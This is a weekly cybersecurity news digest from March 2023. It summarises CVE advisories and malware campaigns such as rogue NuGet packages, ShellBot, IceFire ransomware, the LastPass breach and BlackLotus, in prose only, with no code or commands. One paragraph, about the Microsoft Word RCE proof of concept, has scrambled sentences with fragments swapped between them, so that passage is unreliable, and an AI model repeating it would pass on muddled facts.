03/16/2023-03/23/2023 Rogue NuGet Packages Infect .NET Developers, New ShellBot DDoS Malware Variants, Adobe ColdFusion Vulnerability Exploited in the Wild And More

1. CISA Alerts on Critical Security Vulnerabilities in Industrial Control Systems

 CISA has released eight Industrial Control Systems (ICS) advisories, warning of critical flaws affecting equipment from Delta Electronics and Rockwell Automation. This includes 13 security vulnerabilities in Delta Electronics’ InfraSuite Device Master, a real-time device monitoring software. All versions prior to 1.0.5 are affected by the issues. Successful exploitation of these vulnerabilities could allow an unauthenticated attacker to obtain access to files and credentials, escalate privileges, and remotely execute arbitrary code. At the top of the list is CVE-2023-1133 (CVSS score: 9.8), a critical flaw that arises from the fact that InfraSuite Device Master accepts unverified UDP packets and deserializes the content, thereby allowing an unauthenticated remote attacker to execute arbitrary code.

2. Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware

The NuGet repository is the target of a new “sophisticated and highly-malicious attack” aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down. The packages contained a PowerShell script that would execute upon installation and trigger a download of a ‘second stage’ payload, which could be remotely executed. Three of the most downloaded packages – Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API – alone accounted for 166,000 downloads, although it’s also possible that the threat actors artificially inflated the download counts using bots to make them appear more legitimate. The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, in which fake packages are assigned names that are similar to legitimate packages, in order to trick developers into downloading them. 

3. New ShellBot DDoS Malware Variants Targeting Poorly Managed Linux Servers

A new cyber attack campaign is targeting poorly managed Linux SSH servers using a malware called ShellBot. This DDoS Bot malware is written in Perl and communicates via IRC protocol. Hackers use scanner malware to identify servers with open SSH port 22 and weak credentials. They then initiate a dictionary attack using a list of known SSH credentials to breach the server and install the ShellBot payload. Once installed, ShellBot communicates with a remote server via IRC protocol, allowing it to carry out DDoS attacks and exfiltrate data. The attack campaign involves three different ShellBot versions, with the first two offering various DDoS attack commands using HTTP, TCP, and UDP protocols. The third version, PowerBots, offers backdoor-like capabilities such as granting reverse shell access and uploading arbitrary files from the compromised host. If ShellBot is installed, Linux servers can be used as DDoS bots to attack specific targets after receiving commands from the attackers.

4. CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution. Adobe ColdFusion contains an improper access control vulnerability that allows for remote code execution. It’s worth noting that CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations, both of which are no longer supported by the software company as they have reached end-of-life (EoL). While the exact details surrounding the nature of the attacks are unknown, Adobe said in an advisory that it’s aware of the flaw being “exploited in the wild in very limited attacks.”

5. New GoLang-Based HinataBot Exploiting Router and Server Flaws for DDoS Attacks

A new Golang-based botnet dubbed HinataBot has been observed to leverage known flaws to compromise routers and servers and use them to stage distributed denial-of-service (DDoS) attacks. Among the methods used to distribute the malware are the exploitation of exposed Hadoop YARN servers and security flaws in Realtek SDK devices (CVE-2014-8361) and Huawei HG532 routers (CVE-2017-17215, CVSS score: 8.8). The malware, like other DDoS botnets of its kind, is capable of contacting a command-and-control (C2) server to listen for incoming instructions and initiate attacks against a target IP address for a specified duration.
The findings also come as Microsoft revealed that TCP attacks emerged as the most frequent form of DDoS attack encountered in 2022, accounting for 63% of all attack traffic, followed by UDP floods and amplification attacks (22%), and packet anomaly attacks (15%).

6. NordVPN Open Sources Its Linux VPN Client And Libraries

Nord Security has released the source code of its Linux NordVPN client and networking libraries to increase transparency and address users’ security concerns. As part of this, the company has made its NordVPN MeshNet private tunneling feature free for all users who install their software, even if they do not have a paid subscription. This feature allows users to create private tunnels between other NordVPN users to access the internet through the shared network or access internal devices. NordVPN has released the source code for its Linux applications and two libraries, Libtelio and Libdrop, on its GitHub page, encouraging the coding community to scrutinize and improve its code. The company also offers a bug bounty program, with critical vulnerabilities receiving bounties ranging from $10,000 to $50,000

7. SAP Releases Security Updates Fixing Five Critical Vulnerabilities

Software vendor SAP has released security updates for 19 vulnerabilities, five rated as critical, meaning that administrators should apply them as soon as possible to mitigate the associated risks. The flaws fixed this month impact many products, but the critical severity bugs affect SAP Business Objects Business Intelligence Platform (CMC) and SAP NetWeaver.
More specifically, the five flaws fixed this time are the following:

• CVE-2023-23857: Critical severity (CVSS v3: 9.8) information disclosure, data manipulation, and DoS flaw impacting SAP NetWeaver AS for Java, version 7.50. The bug allows an unauthenticated attacker to perform unauthorized operations by attaching to an open interface and accessing services via the directory API.
• CVE-2023-25616: Critical severity (CVSS v3: 9.9) code injection vulnerability in SAP Business Intelligence Platform, allowing an attacker to access resources only available to privileged users. 
• CVE-2023-27269: Critical severity (CVSS v3: 9.6) directory traversal problem impacting SAP NetWeaver Application Server for ABAP. 
• CVE-2023-27500: Critical severity (CVSS v3: 9.6) directory traversal in SAP NetWeaver AS for ABAP.
• CVE-2023-25617: Critical severity (CVSS v3: 9.0) command execution vulnerability in SAP Business Objects Business Intelligence Platform, versions 420 and 430. 

03/08/2023-03/15/2023. Jenkins Security Alert, IceFire Ransomware Exploits IBM Aspera Faspex, Actively Exploited Plex Bug After LastPass Breach And More.

1. New Critical Flaw in FortiOS and FortiProxy Could Give Hackers Remote Access

Fortinet has released fixes to address 15 security flaws, including one critical vulnerability impacting FortiOS and FortiProxy that could enable a threat actor to take control of affected systems. The issue, tracked as CVE-2023-25610, is rated 9.3 out of 10 for severity and was internally discovered and reported by its security teams. A buffer underwrite (‘buffer underflow’) vulnerability in FortiOS and FortiProxy administrative interface may allow a remote unauthenticated attacker to execute arbitrary code on the device and/or perform a DoS on the GUI, via specifically crafted requests. Underflow bugs, also called buffer underruns, occur when the input data is shorter than the reserved space, causing unpredictable behavior or leakage of sensitive data from memory.Other possible consequences include memory corruption that could either be weaponized to induce a crash or execute arbitrary code. Fixes are available in FortiOS versions 6.2.13, 6.4.12, 7.0.10, 7.2.4, and 7.4.0; FortiOS-6K7K versions 6.2.13, 6.4.12, and 7.0.10; and FortiProxy versions 2.0.12, 7.0.9, and 7.0.9.

2. Jenkins Security Alert: New Security Flaws Could Allow Code Execution Attacks

A pair of severe security vulnerabilities have been disclosed in the Jenkins open source automation server that could lead to code execution on targeted systems. The flaws, tracked as CVE-2023-27898 and CVE-2023-27905, impact the Jenkins server and Update Center, and have been collectively christened CorePlague by cloud security firm Aqua. All versions of Jenkins versions prior to 2.319.2 are vulnerable and exploitable. Exploiting these vulnerabilities could allow an unauthenticated attacker to execute arbitrary code on the victim’s Jenkins server, potentially leading to a complete compromise of the Jenkins server. Once the victim opens the ‘Available Plugin Manager’ on their Jenkins server, the XSS is triggered, allowing attackers to run arbitrary code on the Jenkins Server utilizing the Script Console API. Since it’s also a case of stored XSS wherein the JavaScript code is injected into the server, the vulnerability can be activated without having to install the plugin or even visit the URL to the plugin in the first place.

3. Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware

Sunlogin and AweSun remote desktop programs have security vulnerabilities that are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC) reported that this marks the continued abuse of the flaws to deliver various payloads, including the Sliver post-exploitation framework, XMRig cryptocurrency miner, Gh0st RAT, and Paradise ransomware. PlugX is the latest addition to this list. The backdoor is notable for its ability to start arbitrary services, download and execute files from an external source, and drop plugins that can harvest data and propagate using Remote Desktop Protocol (RDP). “New features are being added to [PlugX] even to this day as it continues to see steady use in attacks,” ASEC said.

4.  IceFire Ransomware Exploits IBM Aspera Faspex to Attack Linux-Powered Enterprise Networks

IceFire ransomware, which was previously known to target Windows-based systems, has shifted its focus towards Linux enterprise networks. Cybersecurity company SentinelOne reported that the ransomware is exploiting a recently disclosed vulnerability in IBM Aspera Faspex file-sharing software (CVE-2022-47986) to carry out the intrusions. The attacks have primarily targeted media and entertainment organizations in Turkey, Iran, Pakistan, and the U.A.E. The ransomware binary targeting Linux is capable of avoiding encrypting certain paths, allowing the infected machine to continue functioning. Linux systems are typically more difficult to deploy ransomware against, but actors are turning to exploiting application vulnerabilities to overcome this challenge. Meanwhile, Fortinet FortiGuard Labs has disclosed a new LockBit ransomware campaign using “evasive tradecraft” to bypass MotW protections. 

5. CISA Warns Of Actively Exploited Plex Bug After LastPass Breach

CISA has added a three-year-old remote code execution (RCE) vulnerability in Plex Media Server to its list of security flaws exploited in attacks. CVE-2020-5741 allows attackers with admin privileges to execute arbitrary Python code remotely without user interaction. The vulnerability was patched with the release of Plex Media Server 1.19.3 in May 2020. The attack involves exploiting the Camera Upload feature by setting the server data directory to overlap with the content location for a library on which Camera Upload was enabled. CISA did not provide any details on the attacks. However, this could be related to the recent LastPass data breach after a third-party media software RCE bug was abused to install a keylogger on a senior DevOps engineer’s computer, leading to the theft of credentials and critical backups.

6. New GoBruteforcer Malware Targets phpMyAdmin, MySQL, FTP, Postgres

GoBruteforcer is a new Golang-based botnet malware that targets web servers running phpMyAdmin, MySQL, FTP, and Postgres services. Once it detects an open port accepting connections, it attempts to log in using hard-coded credentials and deploys an IRC bot on compromised phpMyAdmin systems or a PHP web shell on other targeted services. It then reaches out to its command-and-control server and waits for instructions that will be delivered via the previously installed IRC bot or web shell. The botnet uses a multiscan module to find potential victims within a Classless Inter-Domain Routing (CIDR), which grants it a broad selection of targets to infiltrate networks. GoBruteforcer is likely under active development, and its operators are expected to adapt their tactics and capabilities for targeting web servers and stay ahead of security defenses.

7. New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide

An updated version of a botnet malware called Prometei has infected more than 10,000 systems worldwide. Prometei, first observed in 2016, is a modular botnet that features a large repertoire of components and several proliferation methods, some of which also include the exploitation of ProxyLogon Microsoft Exchange Server flaws. The cross-platform botnet’s motivations are financial, primarily leveraging its pool of infected hosts to mine cryptocurrency and harvest credentials. The latest variant of Prometei (called v3) improves upon its existing features to challenge forensic analysis and further burrow its access on victim machines. The attack sequence proceeds thus: Upon gaining a successful foothold, a PowerShell command is executed to download the botnet malware from a remote server. Prometei’s main module is then used to retrieve the actual crypto-mining payload and other auxiliary components on the system. Some of these support modules function as spreader programs designed to propagate the malware through Remote Desktop Protocol (RDP), Secure Shell (SSH), and Server Message Block (SMB).

03/02/2023-03/08/2023. 3 New Flaws Threatening IT Management Systems, Info Stealer and Trojan in Python Package, LastPass Hack, New Flaws in TPM 2.0 Library And More

1. CISA’s KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

CISA has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The list of vulnerabilities is below:

• CVE-2022-35914 (CVSS score: 9.8) – Teclib GLPI Remote Code Execution Vulnerability
• CVE-2022-33891 (CVSS score: 8.8) – Apache Spark Command Injection Vulnerability
• CVE-2022-28810 (CVSS score: 6.8) – Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability

The most critical of the three is CVE-2022-35914, which concerns a remote code execution vulnerability in the third-party library htmlawed present in Teclib GLPI, an open source asset and IT management software package. In October 2022, Shadowserver Foundation noted exploitation attempts against its honeypots. VulnCheck researcher Jacob Baines said a cURL-based PoC and a “mass” scanner were available on GitHub. GreyNoise found 40 malicious IP addresses abusing the shortcoming. The Zerobot botnet exploited an unauthenticated command injection vulnerability in Apache Spark for DDoS attacks. KEV catalog listed a remote code execution flaw in Zoho ManageEngine ADSelfService Plus that was patched in April 2022. Rapid7 detected active exploitation attempts by threat actors. Wallarm found ongoing exploit attempts of two VMware NSX Manager flaws. 

2. Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI

A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool, was identified by Kroll’s Cyber Threat Intelligence team, with the company calling the malware Colour-Blind. The ‘Colour-Blind’ malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. colourfool, like other rogue Python modules discovered in recent months, conceals its malicious code in the setup script, which points to a ZIP archive payload hosted on Discord. The file contains a Python script (code.py) that comes with different modules designed to log keystrokes, steal cookies, and even disable security software. The ‘Colour-Blind’ trojan uses a Flask web application to establish remote control via Cloudflare, according to researchers. It is written almost entirely in Python, unlike the PowerShell-dependent poweRAT. The malware steals passwords, takes screenshots and logs keystrokes. Attackers are now publishing malware on Python packages, while others have deployed Rust executables to drop additional malware. “The risk/reward proposition for attackers is well worth the relatively minuscule time and effort,” the researchers said. 

3. LastPass Hack: Engineer’s Failure to Update Plex Software Led to Massive Data Breach

LastPass’s recent data breach occurred due to an engineer failing to update the Plex media software package on their home computer, highlighting the dangers of not keeping software up-to-date. The password management service revealed that an unidentified party used information stolen in an earlier incident and data from a third-party breach to launch a coordinated attack on the cloud storage environment, stealing encrypted password vault data and customer information. The attackers targeted one of four DevOps engineers, exploiting a now-patched flaw in Plex Media Server, CVE-2020-5741, to execute arbitrary Python code on the engineer’s computer and install a keylogger malware. Unfortunately, the engineer had not updated their software, preventing the patch from being activated. Plex released version 1.19.3.2764, which addressed the exploit, in May 2020.

4. New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices

Serious security flaws have been identified in the Trusted Platform Module (TPM) 2.0 reference library specification, which could potentially result in information disclosure or privilege escalation. Cybersecurity company Quarkslab discovered the vulnerabilities in November 2022. One vulnerability involves an out-of-bounds write, while the other concerns an out-of-bounds read. Large tech vendors and organizations that use enterprise computers, servers, IoT devices, and embedded systems that include a TPM can be impacted by the flaws, potentially affecting billions of devices. TPM is a hardware-based solution designed to provide secure cryptographic functions and physical security mechanisms to resist tampering. The flaws result from a lack of necessary length checks, leading to buffer overflows that could enable local information disclosure or privilege escalation. Users are urged to apply the updates released by TCG and other vendors to address the flaws and mitigate supply chain risks.

5. SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics

The Lucky Mouse threat actor has created a Linux version of its malware toolkit SysUpdate, enabling the group to target devices running on the operating system. The updated version dates back to July 2022 and includes new features to evade security software and resist reverse engineering. Lucky Mouse, also known as APT27, Bronze Union, Emissary Panda, and Iron Tiger, uses a variety of malware, including HyperBro, PlugX, and a Linux backdoor called rshell. The group’s campaigns have involved supply chain compromises of legitimate apps to gain remote access to compromised systems. The recent campaign targeted a gambling company in the Philippines using installers masquerading as messaging apps to activate the attack sequence. The Windows version of SysUpdate features process management, screenshots, file operations, and DNS Tunneling to communicate with C2 servers.

6. Proof-of-Concept Released For Critical Microsoft Word RCE bug

A proof-of-concept for CVE-2023-21716, a critical vulnerability in Microsoft Word that allows remote code execution, has been published over the weekene last year discovered the vulnerability in Microsoft Office’sd. The vulnerability was assigned a 9.8 out of 10 severity score. Security researcher Joshua Drak “wwlib.dll” and sent Microsoft a technical advisory containing proof-of-concept (PoC) code showing the issue is exploitable.
A remote attacker could potentially take advantage of the issue to execute code with the same privileges as the victim that opens a malicious .RTF document. Delivering the malicious file to a victim can be as easy as an attachment to an email, although plenty of other methods exist. Microsoft warns that users don’t have to open a malicious RTF document and simply loading the file in the Preview Pane is enough for the compromise to start. At the moment there is no indication that the vulnerability is being exploited in the wild and Microsoft’s current assessment is that taking advantage of the issue is “less likely.”

7. BlackLotus Bootkit Bypasses UEFI Secure Boot on Patched Windows 11

The BlackLotus UEFI bootkit has been improved with Secure Boot bypass capabilities that enable it to infect fully patched Windows 11 systems. This malware is the first known public example of UEFI malware that can bypass the Secure Boot mechanism, allowing it to disable security protections in the operating system. The malware could impair the BitLocker data protection feature, Microsoft Defender Antivirus, and the Hypervisor-protected Code Integrity. UEFI is low-level code that executes when a computer powers up and controls the booting sequence before the operating system starts. The malware emerged last year, promoted on hacking forums as virtually invisible to antivirus agents, and has a feature set that allows it to bypass security measures. Security researchers at ESET have confirmed the malware can bypass the Secure Boot mechanism by leveraging a vulnerability tracked as CVE-2022-21894.